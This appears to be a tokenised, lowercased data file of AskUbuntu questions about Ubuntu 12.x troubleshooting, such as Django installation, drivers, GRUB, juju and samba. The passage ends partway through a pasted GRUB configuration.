271141	is django installed by default ?	i installed ubuntu 12.10 . is django installed by default on my ubuntu ? if not , how can i install it ?
271150	how do i copy and paste files from one directory to another using the mouse ?	on microsoft windows , i right-click on the file and choose `` copy '' . i place my cursor on the target directory , right-click on it and choose `` paste '' . the file will be copied to the target folder . it seems that ubuntu 12.10 does not have this function . is there a workaround ?
271155	problem : running scripts from remote dir	the problem i have is the following , i recently installed ubuntu and was setting up a map where i could collect all my scripts . the map i use is the bin folder on the location : /home/myusername/bin but now when i try to execute the script from my home folder it does n't work : sh : 0 : ca n't open test.sh . does anyone have an idea why this is ?
271157	why are n't certain indicators showing in unity ?	i 've upgraded to raring a couple of days ago , and noticed that certain indicators are not appearing in my unity panel , while all other do . essentially i 'm referring to : pyalienfx ( from http : //code.google.com/p/pyalienfx/ ) , thunderbird ( with firetray extension , https : //github.com/foudfou/firetray.git ) and pidgin . obviously they all did work with previous 12.10 .
271158	how to convert powerpoint ppsx ( presentation ) to pdf ?	i have a ppsx file with images that i want usable in other environments than office suites : it would be perfect having them as separate images . i could then use them directly ; or create a pdf from them ( i find easy converting images to pdf and extracting images from pdf ) . or may it is possible to convert the ppsx file into pdf with a command or gui ?
271161	kubuntu - drracket 5.1.3 does n't work well	i have ubuntu 12.04 with kde ( latest version from ppa ) , i 've installed drracket from repositories . it starts but i ca n't see menu , here is a picture : do you know why ? do i miss some lib or it 's a kwin problem ? thanks edit : ok here is the errors from terminal : drracket gdk : ia__gdk_window_thaw_updates : assertion `impl_window- > update_freeze_count > 0 ' failed gdk : ia__gdk_window_thaw_updates : assertion `impl_window- > update_freeze_count > 0 ' failed
271162	list of wireless adapters that work with linux : who maintains the list ?	there is a list of wireless adapters that work with linux/ubuntu here this list is not up-to-date - there are many entries for adapters that are no longer available , and almost certainly no entries for more recent adapters . in my case i would like offer to details on the adapter i am using , a tp-link tl-wn781nd . who do i contact ?
271163	how do i update intel e1000 driver ? server reverts to old driver on reboot	i have a kvm server and i 'm trying to update my intel e1000 drivers . i can install the new drivers using the following code make clean make make install modprobe -rv e1000 modprobe e1000 afterwards , when i run ethtool -i eth0 it tells me that the driver is the new version ( 8 . * ) but then when i reboot my server and run the same ethtool command it returns the old driver ( 7 . * ) what 's going on , and how do i stop it from happening ? thanks
271171	can compiz work in an ubuntu guest in vmware workstation 9 ?	opengl it 's supported in vmware workstation 9 http : //www.vmware.com/support/ws90/doc/workstation-90-release-notes.html # opengl so compiz theoretically can run inside a ubuntu guest in vmware workstation 9 , it 's possible or not ? i saw that virtual box linux guest can run compiz , vmware can ?
271175	how to enable rpc in aria2c download manager ?	i want to enable rpc in aria2c download manager , so that i can pause and resume downloads from command line . when i run aria2c -- rpc-listen-port=6800 http : //torrage.com/torrent/9c76dcceb643d27d6adc9253c713407d5f2ae3af.torrent an error displays ... unrecognized option ' -- rpc-listen-port=6800' exception : [ optionparser.cc:149 ] failed to parse command-line options . usage : aria2c [ options ] [ uri | magnet | torrent_file | metalink_file ] ... printing options tagged with ' # help ' . see -h option to know other command-line options ( # basic , # advanced , # http , # https , # ftp , # metalink , # bittorrent , # cookie , # hook , # file , # xml-rpc , # experimental , # help , # all ) . options : -h , -- help [ =tag|keyword ] print usage and exit . the help messages are classified with tags . a tag starts with `` # '' . for example , type `` -- help= # http '' to get the usage for the options tagged with `` # http '' . if non-tag word is given , print the usage for the options whose name includes that word . possible values : # basic , # advanced , # http , # https , # ftp , > # metalink , # bittorrent , # cookie , # hook , # file , # xml-rpc , # experimental , # help , # all default : # basic tags : # basic , # help refer to man page for more information . what 's wrong ? refer : http : //aria2.sourceforge.net/manual/en/html/aria2c.html # id3
271176	avconv convert .mts using libx264 2 pass	i know there are similar questions around , but unfortunately did n't find answer to my question . what i like to achieve is video camera originated videos compress as small as possible with as less as possible quality loss . and resize video from 1080p to 720p ( 720i ) . so to get best result it is advisable to use 2 pass encoding . at this problem i have a problem . when i run 2nd pass i get error : [ libx264 @ 0xd9b8a0 ] constant rate-factor is incompatible with 2pass . i have tried very different configurations , but unfortunately did n't find where is my mistake . for example : avconv -y -i 00000.mts -qscale 3 -vcodec libx264 -preset medium -pass 1 -f mp4 /dev/null avconv -y -i 00000.mts -qscale 3 -vcodec libx264 -preset medium -pass 2 test.mp4 i 'd be happy if someone could advise how to achieve my goal , or at least point to my mistake ; ) thanks !
271180	ubuntu 12.4 not working	this is message i get when i turn laptop on , have tried various things but nothing helps . not an it wizard so basic instructions to help would be appreciated . screen reads ... . errors were found while checking the disk drive for / . press f to attempt to fix the errors , i to ignore , s to skip mounting or m for manual recovery ... ... any ideas please
271181	error message : unable to mount location ubuntu 12.10	when trying to open the internal hard drive , the error message : unable to mount location , ca n't mount file appears . note : ubuntu was installed over windows
271184	paypal not working in the ubuntu software center	paypal ist not working for me on ubuntu 12.10 in the ubuntu software center ( usc ) any more . i bought a lot of stuff via paypal on the usc but now it stops working : after the `` log in to your paypal account to complete this purchase '' dialog appears and clicking on the `` log in '' button , the dialog with the text `` please continue your purchase in the secure window we opened . if you do n't see it , click the button below '' appears . if i click on the `` go '' button , nothing happens . any ideas ? is this a bug ?
271185	jabber client with support of gtalk xep-136	i ask you to suggest any jabber client , which support gtalk xep-136 extension . this extension allows you to access the latest messages stored on the server . for example , i talk to someone through gtalk on my phone , then open jabber client on my computer and can see the last n ( default 10 ) messages in the conversation . i know only one application with this feature , and it is google talk , but it have not a native version for ubuntu/linux .
271186	how do i resolve the tty problem ?	i am developing project by using python script in ubuntu 10.04 . in my project , i need to reboot the system automatically at particular time period . so that , i was wrote the below command in my python script.passwd = `` my system password '' os.system ( 'echo % ( passwd ) s | sudo reboot -f ' % locals ( ) ) it was working fine but today when i run my script it throws the below error.sudo no tty present and no askpass program specified how to resolve this problem.i need to reboot my system through python script.if you know let me , your answer is very useful to me .
271188	how to add a server to update servers in ubuntu ?	my update server was configured to `` ir.archive.ubuntu.com '' and i downloaded ubuntu updates from it . now that server has been deleted from my update servers list ! i do n't know how . is it possible to add this server again to my update server list ? english is not my native language ; please excuse typing errors .
271189	missed to enable 3d acceleration on virtualbox	i had installed ubuntu 11.10 on virtualbox 4.1.8 over windows 7 ( 64-bit , graphics card ati radeon hd 5470 ) as the host . i was trying to run opengl es programs on ubuntu wherein i faced an error during execution : - opengl warning : enable 3d acceleration on your vm . segmentation fault i went to the display options of my virtualbox and found 3d acceleration to be disabled . i did n't knew that opengl required 3d acceleration to be enabled while installing ubuntu setup and missed doing the same . now i am unable to enable it from virtualbox and also i am unable to run opengl exe 's on ubuntu . kindly help on the same .
271197	not able to save files	i had installed apache , php just now and for checking whether php executes i had opened /var/ww and edited index.html file , but i was unable to save the file . it says i do have the proper permissions to save the file . i had logged in as administrator . i had right clicked the index.html and i was unable to edit permissions it says i am not the owner . what to do with this ? thanks to all !
271199	touchpad is unresponsive on every reboot	i downloaded the intel graphics utility to fix the xserver-xorg-video crash and then my touchpad was unresponsive on every reboot . in order to get the touchpad back , i had to dustin @ dustin : ~ $ sudo modprobe -r psmouse dustin @ dustin : ~ $ sudo modprobe psmouse proto=imps is there a fix or do i need to do this every time i log on ?
271201	problem with ubuntu 12.04 installation -- - synaptic does not run	i am trying to repair my daughters ubuntu machine 12.04 . i am not very familiar with the gnome 3 system , using lubuntu myself . the machine has some problems : i can not find the gnome 3 applications permitting to browse installed programs synaptic will not start ( starting it opens the synaptic window , asking the password , and then immedatly quitting after typing the password ) i can not find any terminal application ! ( searching for `` terminal '' says `` not found '' any ideas how to repair this machine ? no i could open gnome-terminal ( after updating to 12.10 ) the other problems remain ! here is the output when trying to start synaptic from the terminal : phajsi @ phajsi-laptop : ~ $ sudo synaptic fontconfig warning : `` /etc/fonts/conf.d/65-ttf-sil-andika.conf '' , line 14 : having multiple values in is n't supported and may not works as expected fontconfig warning : `` /etc/fonts/conf.d/65-ttf-sil-andika.conf '' , line 32 : having multiple in is n't supported and may not works as expected fontconfig warning : `` /etc/fonts/conf.d/65-ttf-sil-andika.conf '' , line 32 : having multiple in is n't supported and may not works as expected fontconfig warning : `` /etc/fonts/conf.d/65-ttf-sil-andika.conf '' , line 32 : having multiple in is n't supported and may not works as expected fontconfig warning : `` /etc/fonts/conf.d/65-ttf-sil-andika.conf '' , line 32 : having multiple in is n't supported and may not works as expected fontconfig warning : `` /etc/fonts/conf.d/65-ttf-sil-andika.conf '' , line 32 : having multiple in is n't supported and may not works as expected fontconfig warning : `` /etc/fonts/conf.d/65-ttf-sil-andika.conf '' , line 32 : having multiple in is n't supported and may not works as expected fontconfig warning : `` /etc/fonts/conf.d/65-ttf-sil-andika.conf '' , line 32 : having multiple in is n't supported and may not works as expected another update ... i have now reinstalled ubuntu 12.10 over the previous installation ... all the problems remain ! what can be the reason for this ? 1 ) it was necessary to wipe the old installation and to do a completely new install , not reinstall 2 ( problems caused becaiuse of my somewhat inusual situation /// this is a norweg9an language version of ubuntu , with a spanish keyboard ?
271204	how to improve gui and font appearance of programs installed under crossover ?	this can be done in wine but can it be done in crossover ?
271207	what 's the best way to configure the containers to have an ip directly on the lan	i see that there are a lot of new ease-of-use improvements to lxc in 12.04 & 12.10 , and although i see some description to setting up bridged networking such that my containers have their own lan ip , i have the sneaky feeling that maybe there 's a `` simpler '' way in ubuntu 12.10 now ? http : //lxc.sourceforge.net/index.php/about/kernel-namespaces/network/configuration/ i did n't quite grasp it from the ubuntu server docs . could anyone help me know which path is best to follow here ?
271212	should i wait for 13.04 ?	at the moment i have mint on my computer , and i want to change back to ubuntu , but with 13.04 coming so soon , should i install 12.10 and upgrade , or are there any advantages in waiting and doing a fresh install of 13.04 ?
271216	my ram and cpu 's are free but my computer is so slow ( ubuntu 12.10 ) ?	i have 8 gb ram and 2 cpu , i install ubuntu 12.10 on my laptop . the system works strangely . the computer becomes slow for no reasons ! i ran top and htop and there is nothing that uses my cpu or my ram ( i mean nothing that use the whole ram or cpu ) . i even change the platform several time ( now is xubuntu ) . but still it freezes when i do simple things . ( like when i 'm editing a document ! ) but surprisingly when i run a program ( that use lots of memory ) the laptop functions normal ! i have no idea what is the problem ! or how can i find it ! i even thought it might be because of chrome ! but the computer freeze even when i 'm not using chrome ! it freeze for few minutes ( the mouse moves really slow , the windows change slowly ) and then it 's okay for few more minutes ! can someone tell me what i should do ! or how can i find out what is the problem ?
271227	/dev/nvidiactl not present	i have an nvidia gt 540m ( based on lspci output ) graphics card and am trying to install its drivers . i have tried various options like downloading from nvidia 's website , cuda 4.2 homepage ( can not post more than 2 links ) and apt-get ( apt-get install nvdia-current ) ( also through `` additional drivers '' app , but i guess it is same as apt-get ) but i am unable to install it . after searching online , it seems i should have files like /dev/nvidia** but i do n't have it . nvidia-smi always returns the same error : nvidia : could not open the device file /dev/nvidiactl ( no such file or directory ) . nvidia-smi has failed because it could n't communicate with nvidia driver . make sure that latest nvidia driver is installed and running . i followed this tutorial too . and everytime i install the driver , my resolution drops to 640x480 and no matter what is does n't change . i have to apt-get purge nvidia* then install xserver again to get it back right , or reinstall ubuntu . i have installed ubuntu 4 times already to get this right , but nothing works . can someone please help me out with this . i have a 32-bit system running ubuntu 12.04 . thanks
271228	booting randomly changes device nodes of hdds , problem with munin	i have an ubuntu server running 12.10 with an internal ( mainboard ) sata controller and an additional pcie sata controller and also external usb hdds . my problem is that the links to the devices ( /dev/sda/sdb/sdc/sdd/sde/ ... ) are changing randomly . i am also using munin to monitor the ubuntu 12.10 system ... when sda goes to sde all diagrams will be useless , because munin relies on not changing these node names and monitors /dev/sda , /dev/sdb ... does anyone have an idea on solving this ? thanks and best regards jens
271229	how can i open a interactive pdf ( created with mingmanager software ) in ubuntu ?	i 'm following a on-line course about intellectual property . the professor uses interactive maps or schemes where the themes are displayed . beside every theme is a plus sign wich opens new content when clicked . the presentation was created with mindmanager ( mindjet ) but the files are downloadable in pdf , so they can be viewed with acrobat reader . the thing is i 've tried with the ubuntu document viewer and with okular but all i get is one page that says `` click to start mindjet presentation '' and it does n't work . here are the conceptual maps if you need to read the instructions or download them
271235	fd0 error in ubuntu server 12.04 lts when trying to boot	i 'm using a ubuntu server 12.04 lts hostbox with a virtual windows domain controller ( kvm ) on it . there was a recent power outage and ever since then , it will not boot normally . when i boot it up , i get a brief splash of an `` fd0 error '' at post and then it either shows me a black screen or it gives me alternative boot options to older versions . here 's where it gets funny . of the first alternatives shown , i ca n't boot to any of them ( i get a black , blank screen , but on that same list there is also the option of `` other linux versions ) . when i select that , it takes be to another list of older verions and when i select one of those , it boots into ubuntu just fine . i 've left it running like this so that the server can remain in use for the users , so for now , it 's fine . this is an environment where there are always users logged into the server , so i would like to have the least amount of downtime as possible . i 've already went through all of the recovery and troubleshooting options/list and none of them worked . any ideas would be greatly appreciated . p.s i 'm trying to avoid a reinstallation here thanks
271237	how do i reset the network stack as if from a reboot ?	sometimes my netbook ( dell mini 10v with broadcom bcm4322 wireless adapter , ubuntu 12.04.2 lts ) gets into a state where it can see wireless connections but not connect to them . rebooting always fixes this , but is a pain in the neck . sometimes sudo service network-manager restart works too , but not always . i suspect a problem somewhere in the network stack , probably driver-related , but i 've no idea how to find out what it is , and the fault is too intermittent for blind debugging anyway . is there any way to force a reset of the entire network stack without having to do a full reboot ? several different commands is fine . i can script . failing that , is there a detailed guide to working out what the problem actually is ?
271238	how do i change the bucket fill colour in gimp image editor ?	how do i change the bucket fill colour in gimp image editor ?
271240	pcmanfm prompt `` this file is executable . do you want to execute it ? '' when double clicking a file	i use lubuntu . i downloaded a .tar.bz2 of sublime text 2 , and extracted it . when i double click the sublime_text executable , a window pops up with `` this file is executable . do you want to execute it ? '' message . how can i launch sublime text without that prompt ?
271241	how can i connect to a usb printer shared by an apple airport ?	i 've just moved from mac os x to ubuntu , now i 'm running ubuntu natively on a dedicated partition on a mac , and i 've an apple airport wifi router , sharing a usb printer with my family . the problem is that i 've not yet found any way to print from ubuntu . can someone help ?
271242	grep list each file once	i 'm looking some text in files , but three are a lot of files and searched text appears several times in one file , how can i receive a list of files that contains searched text with every file listed only once ?
271251	notify-osd and gmail in 12.10 / 13.04	does online accounts with a gmail accounts , shows notification bubbles when a new email arrive or does just the email envelope icon turns blu ( like to me ) ? both in 12.10 and in raring . thanks .
271253	how do i combine multiple tif files into a single tif file ?	i have a series of tif files and would like to convert them into a single tif file how do i do that ?
271256	ubuntu server unresponsive	ubuntu server unresponsive 12.04 1 ) my site is not responding by http : curl -- request get 'http : //mysite.com' curl : ( 7 ) could n't connect to host ( does n't respond on a web browser either ) 2 ) tried to ssh into it : ssh username @ ip ssh : connect to host ip_address port 22 : operation timed out is there another way to remotely check what 's wrong with the server , without having to go to it ?
271264	use old gcc version	i 've been trying to get an old version of gcc for my ubuntu but i ca n't find any working way to achieve that . i 'd like to use the version 4.1.2 of gcc , and i currently got the 4.7.2 . how may i install gcc 4.1.2 ?
271267	how can i to access my windows partition after i 've installed ubuntu ?	i have installed ubuntu 12.10 and after i boot into it i am unable to see any of my windows drives . how can i to access my windows partition after i 've installed ubuntu ?
271271	how do i produce a multi-page sandwich pdf with hocr2pdf ?	i used tesseract to produce the special html to use with hocr2pdf starting from a muti-page tif . i tried using hoc2pdf to produce a `` sandwich pdf '' ( image + hidden text layer ) . hocr2pdf produces a one page pdf with all the pages superimposed . is there a way to solve this problem or an alternative solution ?
271272	nothing is written in a file created from a upstart job	i have a program in /home/me/bin/foo , typically compiled from : // includes ... # define pathname `` /home/me/bin/bar.txt '' int main ( ) { file* f ; f = fopen ( pathname , `` wb '' ) ; // i skip the possible error for freshness fputs ( getenv ( `` home '' ) , f ) ; fclose ( f ) ; return 0 ; } when i run the program from the directory in non-privileges user mode , the file bar.txt is created with /home/me written inside , that works fine.. .. until now my upstart configuration file in /etc/init looks like the following : start on started tty2 exec /home/me/bin/foo when i restart tty2 , the file /home/me/bin/bar.txt is well created but nothing is written inside . i 've tried to write something else than getenv ( `` home '' ) , like a basic string but still nothing . why is that happening ? what should i do ? update.1 : after few hours i just noticed that my pointer to the file was not handled properly.. anyway except that little misunderstanding , that changes did n't solve my problem . i still have nothing in the file when i write getenv ( `` home '' ) . why ? the process is executed as the root and getenv ( `` home '' ) is intended to write at least '/root'
271275	how to fix an error installing samba ?	i can not install samba in my computer , i get the following error message : could not connect to 192.168.1.5:3128 ( 192.168.1.5 ) . - connect ( 113 : no route to host ) failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/s/samba/samba_3.5.11~dfsg-1ubuntu2.3_i386.deb '' can anyone help ?
271280	how to install powertop 2.3 & permanently save changed of powertop suggestions in ubuntu ?	i have google every ppa and checked that they all have the powertop 2.1 , so how can i install powertop 2.3 just recently released . how do make permanently save changes of powertop , i know i can put all the output of powertop in rc.local but after plugin ac power and plugged out ac power all changes are lost , because all changes are made on boot not on `` ac plugin and ac plug-out `` , so i want to only powertop commands to work if i my on battery ( ac plugged out ) and when i plugged in ac power i want performance , i do n't want to save battery as i m on ac power .
271282	where is the steam directory folder in 12.04 ?	i 've checked in the home folder but this is all i see .
271285	what is the ubuntu installation going to do to my windows files ... ?	i am installing ubuntu 12.10 in windows with wubi and i want to know if it 's going to copy my windows files and place them in ubuntu , or move them to ubuntu , or leave the windows files so i start with an empty ubuntu ( which i want ) . can someone please tell me ?
271291	php mail ( ) function not working	i 've been trying to configure the mail ( ) function for 3 days by now , and i 'm running out of ideas . i 've installed and configured postfix as a satellite , following this guide : how to have my php send mail ? but it seems i lack the file /etc/postfix/sender_canonical ( and of course i have no idea of what to put inside it ) . by now this is the only clue i have about the problem ... i 'm trying to run it on ubuntu 12.04 laptop , built with x32 architecture . edit : after a few iterations of apt-get purge and apt-get install , mail ( ) started to return true , the error log has stopped growing so it seems all ok , but no mail managed to reach my inbox , not even as spam .
271298	how to add landscape monitoring to machine 0 in juju	the juju landscape charm supports adding relations to services , but there is no visible service in machine 0 to add a relation to . how to add it to landscape then ?
271311	error is not recoverable : exiting now	i want to install django . i have the following instructions to do this : wget `` http : //www.djangoproject.com/download/1.4/tarball/ '' -o django-1.4.tar.gz tar xzvf django-1.4.tar.gz cd django-1.4 sudo python setup.py install when i run the second line ( i.e. , tar xzvf django-1.4.tar.gz ) then i get the following message : gzip : stdin : not in gzip format tar : child returned status 1 tar : error is not recoverable : exiting now is there any problem ? please help me .
271312	what to do when juju machine 0 has got `` agent-state : not-started '' state	after running a juju environment for some time , now machine 0 has got status : `` agent-state : not-started '' that has persisted for some time now and it is unable to deploy any new machines . `` juju ssh 0 '' gives waiting for machine to come up '' . i have also tried rebooting it from amazon ec2 console without any change . what do i do to to get it up again ?
271321	is there any downloader for ubuntu which can resume files ?	i just wanted to know if there is any option or if it is a flaw in ubuntu . i 've seen how to resume file using wget , but it is inconvenient because the link to the file has to be typed again . what to do if i 've lost that link or server has changed it ?
271323	windows missing from grub menu	when i turn on the computer , i can see the grub and boot into ubuntu . but i ca n't boot into windows because i do n't see it in the grub . i have tried both boot-repair and sudo update-grub to no avail . it is probably worth mentioning that the bios uses uefi to manage it 's booting . i have ubuntu 12.10 and windows 7 installed somewhere on the same drive . why is the mbr on /dev/sdb ? this is the output of bootinfoscript : > boot info script 0.61 [ 1 april 2012 ] > > > ============================= boot info summary : =============================== > > = > grub2 ( v1.99 ) is installed in the mbr of /dev/sda and looks at > sector 2048 > of the same hard drive for core.img . core.img is at this location and > looks in partition 72 for . = > windows is installed in the mbr of /dev/sdb . > > sda1 : > __________________________________________________________________________ > > file system : bios boot partition > boot sector type : grub2 's core.img > boot sector info : > > sda2 : > __________________________________________________________________________ > > file system : > boot sector type : - > boot sector info : > mounting failed : mount : unknown filesystem type '' > > sda3 : > __________________________________________________________________________ > > file system : ntfs > boot sector type : windows vista/7 : ntfs > boot sector info : no errors found in the boot parameter block . > operating system : windows 7 > boot files : /windows/system32/winload.exe > > sda4 : > __________________________________________________________________________ > > file system : ext4 > boot sector type : - > boot sector info : > operating system : ubuntu 12.10 > boot files : /boot/grub/grub.cfg /etc/fstab > > sda5 : > __________________________________________________________________________ > > file system : swap > boot sector type : - > boot sector info : > > sdb1 : > __________________________________________________________________________ > > file system : ntfs > boot sector type : windows vista/7 : ntfs > boot sector info : no errors found in the boot parameter block . > operating system : > boot files : > > ============================ drive/partition info : ============================= > > drive : sda > _____________________________________________________________________ > > disk /dev/sda : 128.0 gb , 128035676160 bytes 255 heads , 63 > sectors/track , 15566 cylinders , total 250069680 sectors units = > sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 > bytes / 512 bytes > > partition boot start sector end sector # of sectors id system > > /dev/sda1 1 250,069,679 250,069,679 ee gpt > > > guid partition table detected . > > partition start sector end sector # of sectors system /dev/sda1 > 2,048 206,847 204,800 bios boot partition /dev/sda2 > 206,848 468,991 262,144 microsoft reserved partition > ( windows ) /dev/sda3 468,992 153,599,999 153,131,008 data > partition ( windows/linux ) /dev/sda4 153,600,000 235,630,591 > 82,030,592 efi system partition /dev/sda5 235,630,592 > 250,068,991 14,438,400 swap partition ( linux ) > > drive : sdb > _____________________________________________________________________ > > disk /dev/sdb : 1000.2 gb , 1000204886016 bytes 255 heads , 63 > sectors/track , 121601 cylinders , total 1953525168 sectors units = > sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 > bytes / 4096 bytes > > partition boot start sector end sector # of sectors id system > > /dev/sdb1 * 2,048 1,953,521,663 1,953,519,616 7 ntfs / > exfat / hpfs > > > `` blkid '' output : > ________________________________________________________________ > > device uuid type > label > > /dev/sda3 d2d6c580d6c56577 ntfs > /dev/sda4 a0377dfb-e3c9-4000-972b-0e4300d38516 ext4 > /dev/sda5 69411fce-44e7-42c5-8cfe-b6a8e03e0a89 swap > /dev/sdb1 844e93694e935332 ntfs > andante > > ================================ mount points : ================================= > > device mount_point type options > > /dev/sda4 / ext4 > ( rw , errors=remount-ro ) > > > =========================== sda4/boot/grub/grub.cfg : =========================== > > -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- > # > # do not edit this file > # > # it is automatically generated by grub-mkconfig using templates > # from /etc/grub.d and settings from /etc/default/grub > # > > # # # begin /etc/grub.d/00_header # # # if [ -s $ prefix/grubenv ] ; then set have_grubenv=true load_env fi set default= '' 0 '' > > if [ x '' $ { feature_menuentry_id } '' = xy ] ; then > menuentry_id_option= '' -- id '' else menuentry_id_option= '' '' fi > > export menuentry_id_option > > if [ `` $ { prev_saved_entry } '' ] ; then set > saved_entry= '' $ { prev_saved_entry } '' save_env saved_entry set > prev_saved_entry= save_env prev_saved_entry set boot_once=true fi > > function savedefault { if [ -z `` $ { boot_once } '' ] ; then > saved_entry= '' $ { chosen } '' > save_env saved_entry fi } > > function recordfail { set recordfail=1 if [ -n `` $ { have_grubenv } '' > ] ; then if [ -z `` $ { boot_once } '' ] ; then save_env recordfail ; fi ; fi } > > function load_video { if [ x $ feature_all_video_module = xy ] ; then > insmod all_video else > insmod efi_gop > insmod efi_uga > insmod ieee1275_fb > insmod vbe > insmod vga > insmod video_bochs > insmod video_cirrus fi } > > if [ x $ feature_default_font_path = xy ] ; then font=unicode else > insmod part_gpt insmod ext2 set root='hd0 , gpt4 ' if [ > x $ feature_platform_search_hint = xy ] ; then search -- no-floppy > -- fs-uuid -- set=root -- hint-bios=hd0 , gpt4 -- hint-efi=hd0 , gpt4 -- hint-baremetal=ahci0 , gpt4 a0377dfb-e3c9-4000-972b-0e4300d38516 else search -- no-floppy -- fs-uuid -- set=root > a0377dfb-e3c9-4000-972b-0e4300d38516 fi > font= '' /usr/share/grub/unicode.pf2 '' fi > > if loadfont $ font ; then set gfxmode=auto load_video insmod > gfxterm set locale_dir= $ prefix/locale set lang=en_us insmod > gettext fi terminal_output gfxterm if [ `` $ { recordfail } '' = 1 ] ; then > set timeout=-1 else set timeout=10 fi > # # # end /etc/grub.d/00_header # # # > > # # # begin /etc/grub.d/05_debian_theme # # # set menu_color_normal=white/black set > menu_color_highlight=black/light-gray if background_color 44,0,30 ; > then clear fi > # # # end /etc/grub.d/05_debian_theme # # # > > # # # begin /etc/grub.d/10_linux # # # function gfxmode { set gfxpayload= '' $ { 1 } '' if [ `` $ { 1 } '' = `` keep '' ] ; then set > vt_handoff=vt.handoff=7 else set vt_handoff= fi } if [ > `` $ { recordfail } '' ! = 1 ] ; then if [ -e $ { prefix } /gfxblacklist.txt ] ; > then > if hwmatch $ { prefix } /gfxblacklist.txt 3 ; then > if [ $ { match } = 0 ] ; then > set linux_gfx_mode=keep > else > set linux_gfx_mode=text > fi > else > set linux_gfx_mode=text > fi else > set linux_gfx_mode=keep fi else set linux_gfx_mode=text fi export linux_gfx_mode if [ `` $ { linux_gfx_mode } '' ! = `` text '' ] ; then > load_video ; fi menuentry 'ubuntu ' -- class ubuntu -- class gnu-linux > -- class gnu -- class os $ menuentry_id_option 'gnulinux-simple-a0377dfb-e3c9-4000-972b-0e4300d38516 ' { recordfail > gfxmode $ linux_gfx_mode insmod gzio insmod part_gpt insmod ext2 > set root='hd0 , gpt4 ' if [ x $ feature_platform_search_hint = xy ] ; then > search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , gpt4 > -- hint-efi=hd0 , gpt4 -- hint-baremetal=ahci0 , gpt4 a0377dfb-e3c9-4000-972b-0e4300d38516 else search -- no-floppy > -- fs-uuid -- set=root a0377dfb-e3c9-4000-972b-0e4300d38516 fi linux /boot/vmlinuz-3.5.0-26-generic > root=uuid=a0377dfb-e3c9-4000-972b-0e4300d38516 ro quiet splash > $ vt_handoff initrd /boot/initrd.img-3.5.0-26-generic } submenu > 'advanced options for ubuntu ' $ menuentry_id_option > 'gnulinux-advanced-a0377dfb-e3c9-4000-972b-0e4300d38516 ' { menuentry > 'ubuntu , with linux 3.5.0-26-generic ' -- class ubuntu -- class gnu-linux > -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.5.0-26-generic-advanced-a0377dfb-e3c9-4000-972b-0e4300d38516' > { recordfail gfxmode $ linux_gfx_mode insmod gzio insmod > part_gpt insmod ext2 set root='hd0 , gpt4 ' if [ > x $ feature_platform_search_hint = xy ] ; then > search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , gpt4 -- hint-efi=hd0 , gpt4 -- hint-baremetal=ahci0 , gpt4 a0377dfb-e3c9-4000-972b-0e4300d38516 else > search -- no-floppy -- fs-uuid -- set=root a0377dfb-e3c9-4000-972b-0e4300d38516 fi echo 'loading linux > 3.5.0-26-generic ... ' linux /boot/vmlinuz-3.5.0-26-generic root=uuid=a0377dfb-e3c9-4000-972b-0e4300d38516 ro quiet splash > $ vt_handoff echo 'loading initial ramdisk ... ' > initrd /boot/initrd.img-3.5.0-26-generic } menuentry 'ubuntu , with > linux 3.5.0-26-generic ( recovery mode ) ' -- class ubuntu -- class > gnu-linux -- class gnu -- class os $ menuentry_id_option > 'gnulinux-3.5.0-26-generic-recovery-a0377dfb-e3c9-4000-972b-0e4300d38516' > { recordfail insmod gzio insmod part_gpt insmod ext2 set > root='hd0 , gpt4 ' if [ x $ feature_platform_search_hint = xy ] ; then > search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , gpt4 -- hint-efi=hd0 , gpt4 -- hint-baremetal=ahci0 , gpt4 a0377dfb-e3c9-4000-972b-0e4300d38516 else > search -- no-floppy -- fs-uuid -- set=root a0377dfb-e3c9-4000-972b-0e4300d38516 fi echo 'loading linux > 3.5.0-26-generic ... ' linux /boot/vmlinuz-3.5.0-26-generic root=uuid=a0377dfb-e3c9-4000-972b-0e4300d38516 ro recovery nomodeset > echo 'loading initial ramdisk ... ' > initrd /boot/initrd.img-3.5.0-26-generic } menuentry 'ubuntu , with > linux 3.5.0-17-generic ' -- class ubuntu -- class gnu-linux -- class gnu > -- class os $ menuentry_id_option 'gnulinux-3.5.0-17-generic-advanced-a0377dfb-e3c9-4000-972b-0e4300d38516' > { recordfail gfxmode $ linux_gfx_mode insmod gzio insmod > part_gpt insmod ext2 set root='hd0 , gpt4 ' if [ > x $ feature_platform_search_hint = xy ] ; then > search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , gpt4 -- hint-efi=hd0 , gpt4 -- hint-baremetal=ahci0 , gpt4 a0377dfb-e3c9-4000-972b-0e4300d38516 else > search -- no-floppy -- fs-uuid -- set=root a0377dfb-e3c9-4000-972b-0e4300d38516 fi echo 'loading linux > 3.5.0-17-generic ... ' linux /boot/vmlinuz-3.5.0-17-generic root=uuid=a0377dfb-e3c9-4000-972b-0e4300d38516 ro quiet splash > $ vt_handoff echo 'loading initial ramdisk ... ' > initrd /boot/initrd.img-3.5.0-17-generic } menuentry 'ubuntu , with > linux 3.5.0-17-generic ( recovery mode ) ' -- class ubuntu -- class > gnu-linux -- class gnu -- class os $ menuentry_id_option > 'gnulinux-3.5.0-17-generic-recovery-a0377dfb-e3c9-4000-972b-0e4300d38516' > { recordfail insmod gzio insmod part_gpt insmod ext2 set > root='hd0 , gpt4 ' if [ x $ feature_platform_search_hint = xy ] ; then > search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , gpt4 -- hint-efi=hd0 , gpt4 -- hint-baremetal=ahci0 , gpt4 a0377dfb-e3c9-4000-972b-0e4300d38516 else > search -- no-floppy -- fs-uuid -- set=root a0377dfb-e3c9-4000-972b-0e4300d38516 fi echo 'loading linux > 3.5.0-17-generic ... ' linux /boot/vmlinuz-3.5.0-17-generic root=uuid=a0377dfb-e3c9-4000-972b-0e4300d38516 ro recovery nomodeset > echo 'loading initial ramdisk ... ' > initrd /boot/initrd.img-3.5.0-17-generic } } > > # # # end /etc/grub.d/10_linux # # # > > # # # begin /etc/grub.d/20_linux_xen # # # > > # # # end /etc/grub.d/20_linux_xen # # # > > # # # begin /etc/grub.d/30_os-prober # # # > 